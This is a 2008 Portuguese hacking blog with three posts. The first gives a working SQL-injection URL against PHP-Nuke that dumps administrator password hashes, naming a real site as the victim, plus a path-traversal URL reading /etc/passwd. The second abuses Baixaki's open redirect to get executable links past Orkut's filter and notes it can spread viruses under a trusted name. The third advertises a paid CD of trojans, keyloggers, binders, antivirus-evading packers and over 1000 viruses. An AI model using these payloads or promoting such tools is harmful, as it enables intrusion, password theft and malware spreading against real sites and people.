segunda-feira, 25 de fevereiro de 2008

Falha em Nuke-PHP


Primeiro vamos ver o que é Nuke-PHP.
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso, principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.
Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários . Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.


Principais falhas:

Falha 1
-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits considerado pouco seguro.
O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de preferencia o IE)

Falha 2
-erro no arquivo "opendir.php"
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)


Pratica 1 :
Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.

código:
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

Site ( vítima ):
http://www.abaga.com.br


obseve as senhas criptografadas, basta um decripter.

----------

pratica 2 :


Na segunda falha podemos usar o operdir.php
Inocente demais operdir(abrir diretorio)
basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.

Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:
http://www.sitecobaia.com.br/opendir.php?requesturl=/etc/passwd


--------------------------

Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas conhecidas.
Mas muita gente no passado instalou o nuke-PHP em seu site, o site funciona corretamente e por isto não são todos que atualizaram, e esquecem que atualização não corrige apenas erros de desempenho, mas de segurança também.

Links:
Para quem não conhece o Nuke-PHP

----------------------------
By Rackerox (Hall of Hackers)
rackerox@hotmail.com
comprem meu CD ROOM =)

segunda-feira, 18 de fevereiro de 2008

USANDO O BAIXAKI PARA POSTAR ARQUIVOS NO ORKUT


Estava aki no trabalho sem nada pra faze e decidi enviar um pragarama para um amigo...e tipo... a droga do orkut não deixa postar nenhum link do download direto tipo este:[conteúdo removido] phoda =)
Ai pensei em uma forma de Burlar isto.
Um geito seria eu criar uma pagina de redirect com o link e hospedar a pagina.. da certo mas é demorado Ninguem merece rrsrr
Ai tipo tava pensando .. possu usar um redirect pronto em ASP ..tem de monte na net.tipo assim:
O redirect da certo ..mas se o final for ".zip" ".rar" ".exe" ".qualke coisa suspeita o orkut blokeia tipo .. nem adianta nada xD
A soluçao é fazer um redirect q muda o final do link
Ai lembrei da criptografia PODRE do baixaki.( é apenas encode HTML escrito ao contrario)XXX
O redir do baixaki reconhece um link ao contrario por causa da criptografia deles. XXX

Agora vamos na pratica:

tente colar este link no orkut:
http://static.slysoft.com/SetupCloneCD.exe

Muito provavelmente vai aparecer isto:
[conteúdo removido]
link do redirect do baixaki:
link do arquivo ao contrario:
exe.DCenolCputeS/moc.tfosyls.citats//:ptth
Link hackeado para fazer download do arquivo no orkut:
Podem clikar .. vc vai notar que o download é direto ( sem abrir o site do arquivo e sem abrir o baixaki)

alem de arquivo,da pra redirecionar qualke site, mas nem tem nenhuma vantagem em fazer isto xD
Google:

---
ah ..consegui pegar link direto ..la do apostilando.com e fazer isto oh q loku:
olha esta apostila de asp :
hackeei o link ..da pra baixar sem fazer login no site e sem se quer entar no site, tudo só aki pelo orkut usando o redir do baixaki:
http://baixaki.ig.com.br/download-redir.asp?url=piz.psa_4302_3252/slairotut/su.odnalitsopa//:ptth
-----------------------------------------------------
Como deu pra perceber ..da pra enviar qualker virus usando o nome do baixaki ( todo mundo confia nos atquivos de la, e relamente são muito confiaves
Se vc falar q é um programa do baixaki com akele link .. ninguem desconfia.
Mas a ideia nem é passar virus não ..era só para estudar ASP..
Tipo na minha opinião nenhum script de ASP poderia permitir fazer uma coisa destas.Só deveria ser permitido links que estariam no banco de dados.. mas nem acontece isto ..pelo menos no baixaki não.
Se vc tem um site vc não gostaria q usassem o seu nome, a confiança q as pessoas tem em seu site (com seu DOMINIO VERDADEIRO) para enviar virus...axo q ninguem tinha pensado nisto.
Eu postei isto não foi como uma forma de enviar virus .. mas para estudar falhas de segurança .. estas coisas..nem curto sai danu regasso ..nem ganho nada com isto.
Usem isto para estudo sobre web..nem sai dando regasso com um monte de virus no nome do baixaki..se não jaja o orkut da um geito de blokear
Valews galera ... e comprem meu CD rsrsrrrss oh o jabá xDD
http://www.cdhackingtools.com

CRÉDITOS: Rackerox ( Hall of Hackers )

terça-feira, 12 de fevereiro de 2008

CD Hacking Tools


CD ROOM com mais de 400 Programas Haking
O Hacking Tools é um CD de softwares voltado para quem gosta de Hacking em informatica.

Não é apenas mais um CD de programas de invasão, nele vc encontra suporte para Redes, Programaçao, Comunicaçao de dados, TCP/IP, Scans, Exploiters, etc..Tambem tem os trojans e keyllogers .Resumindo todos os tipos de programas que vc presisa para se tornar um hacker de verdade, e não apenas mais um Lamer que sabe rouba senha com KL e invadir por cookies =)

No CD tem uma descrição de cada tipo de programa, e cada programa vem com um "readme" sobre o q ele faz. No site do CD tem uma prévia de tudo.


Conteudo do CD
Trojans Backdoors

Keyloggers

Redes/Internet

Bruteforces

IP Scans

Exploiters/Scans

Nuckers

Binders

Criptografia

Ferramentas de programação

Compiladores

Resource

Conversores

Compressores

Compactadores

Ferramentas para web

Ferramentas para windows

Programas para Msn/orkut

Mais de 1000 virus

Servidores

Clientes

Programas de Segurança

Ferramentas gerais

Análize e manutenção de sistema


Como comprar
o CD room custa apenas R$25,00 + R$1,50 ( carta normal dos correios)Total= R$26,50

A compra é feita atraves do site do CD, é só vc deixar nome e email que vc recebera um formulario o pagamento é feito atraves de depósito bancario.


Links
► Site Oficial



► Prévia do CD



► Conteúdo do CD



► HackingTools on Line (brinde)



► Como Comprar



══════════════════════════════════

Dúvidas
Conteudo detalhado:
Trojans Backdoors
Um meio secreto ou não documentado de invadir um sistema de computador .
Trojan backdoor é um programa que age como a lenda do cavalo de tróia. entrando no computador , e liberando uma porta para um possível invasor.
Os trojans atuais são divididos em duas partes: o servidor e o cliente Normalmente, o servidor está oculto em algum outro arquivo e, no momento que esse arquivo é executado, o servidor se instala e se oculta no computador da vítima; a partir deste momento, o computador pode ser acessado pelo cliente, que irá enviar informações para o servidor executar certas operações no computador da vítima.
Resumindo :
Servidor é o vírus trojan que vai se instalar no pc da vítima
Cliente é o programa que esta no seu pc
E vc precisa de um endereço para conectar o servidor ao cliente ,este endereço é o IP
Keyloggers
Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo o que é digitado.Instalado no computador sem o conhecimento da vítima o keylogger captura dados sensíveis e os envia a um cracker.Neste CD existe Keyloggers que são programáveis para enviar os logs para o email de uma pessoa.
Redes/Internet
-Emita Pacotes UDP (com opção de tamanho de Buffer) para qualquer porta
-Programas para conecção remota ( com suporte para diferentes roteadores )
-Faça uma lista de todas as portas TCP e UDP abertas em seu computador.
-Capture pacotes de IP contendo protocolos http em sua rede
-Procure por pastas compartilhadas
-Desligue um computador de rede local ou através da Internet.
-Altere o seu endereço MAC
-Capture informações de sua rede, conexões são estabelecidas, chats, etc. e monitore tudo á distancia via email.
-Verifique o status de qualquer servidor na internet
-Faça do seu computador um servidor de internet.
-Capture todas as informações do tráfego de sua rede/conexão.
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e também senhas protegidas por asteriscos (útil para senhas de wireless).
-Deixe qualquer porta de seu computador em escuta e crie um log de texto.
-Faça DNS Spoofing ( redirecione qualquer endereço de site para o site que você quiser)
-Mapeie qualquer porta de seu pc para outra maquina
-Monitore qualquer servidor http, smtp, pop3
-Envie emails diretamente para seu pc, faça um diagnostico qualquer servidor smtp
-Editor de cookies
-E muito mais... são vários programas de snifers, scans, telnet, etc.
Bruteforces
(Força Bruta): técnica de intrusão de sistemas que se baseia em tentativa e erro. São geradas palavras e a combinação destas com em nomes de usuários e senhas é tentada exaustivamente até que um usuário válido seja encontrado.Ferramentas para força bruta em:
- HTTP Basic Auth
- HTTP Form
- FTP
- POP3
- TELNET
- SMB (Netbios)
- Custom
IP Scans
Procure portas abertas e falhas de seguranças de um determinado IP ou uma faixa de IP específica.
Obtenha resolução de host names, checagem de portas abertas, varredura de máquinas mortas, varreduras de múltiplas portas. Faça scans até de IP que não respondem ao ping.Procure trojans instalados em uma determinada faixa de IP.
Exploiters/Scans
Um exploit, é um programa com uma porção de dados ou uma sequência de comandos que se aproveita das vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos (ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas.
Nuckers
Nuke é o nome atribuído a programas que finalizam prematuramente com uma conexão TCP através do envio de pacotes ICMP com mensagens de erro. Tais pacotes podem ser direcionadas para o servidor (server side nuke) ou para o cliente (client side nuke).
Tais programas tem a propriedade de terminar com aconexão fazendo com que o cliente ou o servidor sejamenganados por uma mensagem de erro que normalmenteindicaria um problema de conexão entre os dois.
Binders
Ferramenta que combina dois ou mais arquivos em um só, geralmente, com o fim de ocultar um deles. Um binder compila a lista selecionada em um arquivo host, que poderá ser renomeado. Arquivo host é um programa simples compilado e personalizado que irá descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados são automaticamente descompactados e executados. Quando um cavalo de Tróia está vinculado ao Notepad, por exemplo, a sua aparência e execução irão se assemelhar ao Notepad, mas o cavalo de Tróia também será executado
Criptografia
Programas de codificação e Decodificação de dados.
Criptografia de arquivos em pastas, web ,dados,scripts etc.
Programaçao
O CD contem varias ferramentas de programação.
Editores de HTML, PHP , Javascript, binary, hexadecimal.
Ambiente de Programação em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL
Tradutor de Algoritmos. Programas para vc desenvolver o seu software.
Gerador de programa de instalação etc.
Compiladores
Compiladores são programas que permitem transformar códigos escrito na linguagem de programação usada em linguagem de máquina, gerando o binário que pode ser executado.No CD contem compiladores de C C++ Assesmbler Perl
Resource
Modifique, extraia e insira Resources em executáveis, você pode mudar totalmente um programa de 32 bits .Você pode mudar caixas de diálogo, ícones e outras coisas.
Conversores
Corverta vários formatos de arquivo.
De bat para exe, html para exe, pps para exe, vbs para exe, áudio e vídeo para exe, swf para exe, decompilador de flash, conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.).
Compressores
Compressores são programas que executa partes do código ao mesmo nivel de prioridade que o sistema operacional permite supervisar e controlar as aplicações executadas. Excelente para que você esconda seus virus de modo que o antivirus não detecte.
Compactadores
São programas que usam certas técnicas para criar um arquivo, que contém vários arquivos e/ou pastas compactados.No cd contem os programas Winrar, Winzip e UPX
Ferramentas web
Ferramentas para você usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc .
Ferramentas windows
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco, manutenção do sistema, proteção de arquivos, etc.
Vírus
Um vírus de computador nada mais é do que um programa que fica “residente” na memória do microcomputador , e de acordo com determinados parâmetros executa uma ação (normalmente danosa)o cd contem mais de 1000 virus, Virus Builders, arquivos de batch.
Msn/orkut
São mais de 70 programas para msn .
Sniffers para capturar conversas de msn na sua rede
Coloque o vídeo que vc quiser na imagem da sua webcan.
Envie qualquer arquivo que o msn bloqueia.
Programas de flood. Faça um log de todas as musicas que seu amigo ouviu.
"Roube" as imagens de exibição, emotions, etc. dos seus contatos.
Pegue o IP de seu amigo.
Envie uma mensagem automática quando seu amigo fechar sua janela.
Traduza suas mensagens na janela de contato apertando a tecla F5,
Transforme tudo o que você digitar em link de pesquisa
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery.
Mais clientes de msn alem do windows messenger.
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery)
Programas para orkut e mirc.
Servidores
Servidor é um sistema de computação que fornece serviços a uma rede de computadores tanto rede local como à internet.
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP,SSH e PERL.
Hospede seu site em seu próprio computador.
Clientes
Programas que acessam os serviços de um servidor. Telnet, SSH
Segurança
Programas para ajudar na sua segurança, não um kit de anti vírus.Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares, Monitore a segurança de seu computador à distancia.
Crie um emulador de terminal Telnet e SSH.
Ferramentas gerais
Recupere senhas, Altere ícones, resete senha do usuário, crie seus próprios auto executáveis, monitor de webcan, gerenciador de uploads
Mais
Navegadoes: Firefox,Netscape,Opera e Safari
Rode o Linux dentro do windowsSistemas operacionais
Programas que rodam do pen drive
Códigos fontes do:Secure Internet Communication Suíte.Crack Whore 2.2 (Fonte do programa feito para testar a segurança dos sites.)
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.